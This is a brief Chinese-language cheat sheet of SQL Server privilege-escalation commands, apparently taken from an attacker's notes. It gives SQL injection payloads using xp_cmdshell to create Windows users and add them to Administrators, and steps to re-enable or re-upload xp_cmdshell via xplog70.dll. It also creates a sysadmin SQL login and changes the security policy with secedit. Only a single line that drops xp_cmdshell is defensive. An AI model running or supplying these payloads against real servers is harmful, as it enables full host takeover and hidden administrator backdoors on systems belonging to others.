SQL Server提升權限相關命令及防范

exec master..xp_cmdshell "net user name passWord /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代碼開啟cmdshell的SQL語句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判斷存儲擴展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回結果為1就OK

恢復xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回結果為1就OK

否則上傳xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL語句
sp_dropextendedproc "xp_cmdshell"

DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers PassWord /add
net localGroup Administrators TsInternetUsers /add

備份恢復IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/Windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,PassWord
exec master..sp_addsrvrolemember UserName,sysadmin